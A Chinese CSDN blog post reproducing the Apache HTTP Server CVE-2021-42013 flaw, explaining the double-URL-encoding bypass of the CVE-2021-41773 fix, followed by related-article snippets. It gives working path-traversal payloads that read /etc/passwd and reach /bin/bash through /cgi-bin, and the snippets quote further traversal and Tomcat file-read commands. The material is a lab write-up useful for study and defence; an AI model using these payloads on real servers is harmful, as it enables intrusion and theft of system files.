CVE-2021-42013 漏洞复现

最新推荐文章于 2024-04-16 03:05:28 发布
最新推荐文章于 2024-04-16 03:05:28 发布
阅读量540 收藏 1
点赞数
分类专栏: apache 靶场 文章标签: 安全 Apache 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WJ_11_13/article/details/127309942
版权

漏洞原理

Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越。

 文件读取payload

因为点.的url编码是%2e所以之后可以对2进行一次编码或者对e进行一次编码进行构造payload

#  下列payload是先对一个点.进行URL编码为%2e,之后对e单独编码得出%2%65

/icons/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd

命令执行payload

/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/bin/bash

命令执行时操作方法与 CVE-2021-41773 相同

CVE-2021-41773 漏洞复现_爱吃仡坨的博客-CSDN博客

爱吃仡坨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
weblogic 漏洞统计 CVE
09-18
1.CVE-2016-0696 2.CVE-2016-0700 3.CVE-2016-0675 4.CVE-2016-3416 5.CVE-2016-0688 6.CVE-2016-0638 7.CVE-2015-2623 8.CVE-2015-4744 9.CVE-2014-2480 10.CVE-2014-2481 11.CVE-2014-4256 12.CVE-2014-4242 13.CVE-2014-4253 14.CVE-2014-4267 15.CVE-2014-4255 16.CVE-2014-4254 17.CVE-2014-2479 18.CVE-2014-4210 19.CVE-2014-4241 20.CVE-2014-4217 21.CVE-2014-4201 22.CVE-2014-4202 23.CVE-2013-1504 24.CVE-2013-2390 25.CVE-2017-3506 26.CVE-2017-1181 27.CVE-2016-3445 28.CVE-2016-3510 29.CVE-2016-3586 30.CVE-2016-5531 31.CVE-2015-7501 32.CVE-2016-5488 33.CVE-2016-3505 34.CVE-2016-5535 35.CVE-2014-2470 36.CVE-2016-0464 37.CVE-2014-0107 38.CVE-2016-0572 39.CVE-2016-0573 40.CVE-2016-0574 41.CVE-2016-0577 42.CVE-2014-0114 43.CVE-2014-6534 44.CVE-2014-6499 45.CVE-2013-3827 46.CVE-2013-2027 47.CVE-2017-10063 48.CVE-2017-10147 49.CVE-2017-10148 50.CVE-2017-10178 51.CVE-2017-5638 52.CVE-2017-10137 53.CVE-2017-10336 54.CVE-2017-10152 55.CVE-2017-10352 56.CVE-2017-10334 57.CVE-2014-3566 58.CVE-2015-0449 59.CVE-2014-6569 60.CVE-2013-2186 61.CVE-2017-3248 62.CVE-2011-1411 63.CVE-2011-5035 这些漏洞修复情况
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_83946826的博客
04-16 1000
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CVE-2021-42013漏洞复现
信安是不可或缺的一部分!
12-22 3977
影响版本 Apache 2.4.49 Apache 2.4.50 靶场搭建 使用docker搭建靶场环境: docker pull vulfocus/apache-cve_2021_42013:latest #拉取靶场 docker run -itd -p 80:80 vulfocus/apache-cve_2021_42013:latest ## 启动靶场环境 访问靶场环境 代码 利用工具进行代码利用 注意反弹shell级需要开启反弹端口 这里可以使用反弹shell命令 http://
漏洞学习篇:CVE漏洞复现
ZL_1618的博客
12-26 805
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
CVE-2021-42013 Apache HTTP Server 路径穿越漏洞——漏洞复现
qq_60905276的博客
06-07 4742
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
LiBai'S BLOG
11-13 8644
https://66.175.213.123/etc/passwd 请求包 GET https://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 66.175.213.123 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,applica
CVE-2021-42013  Apache HTTP Server 路径穿越漏洞
蚁景网安学院
03-03 2635
前言CVE-2021-42013为目录穿越文件读取漏洞,影响 httpd 2.4.49,CVE编号为CVE-2021-41773, https 2.4.50不完全修复可绕过,如果开启 mo...
中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 705
CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞CVE-2021-41773 ⑤CVE-2021-42013CVE-2021-40438
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-42013 Apache路径穿越&命令执行漏洞复现
afei001
10-10 2337
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.3 CVE-2021-42013 POC 5.修复建议 1.漏洞概述 CVE-2021-42013是由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。 2.影响版本 仅影响...
漏洞修复】 CVE Linux 系统应用漏洞修复笔记
张小三的博客
02-07 6533
根据SSL/TLS协议信息泄露漏洞(CVE-2016-2183)原理,通过发送精心构造的数据包到目标服务,根据目标的响应情况,验证漏洞是否存在。启动完成后查看nginx的版本信息,验证nginx的openssl版本号是否已经升级成功。原本我的nginx中使用的openssl 版本号为:1.0.2s。结束后在此查询openssl的版本号,验证是否升级成功。目录,使用以下命令下载最新版的安装包到此目录下。将以下的内容替换 nginx 的443配置中的。进入nginx的安装目录下的。目录下启动nginx。
nssctf round#4
weixin_63231007的博客
08-21 1184
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
cve-2021-3618漏洞复现
02-06
需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值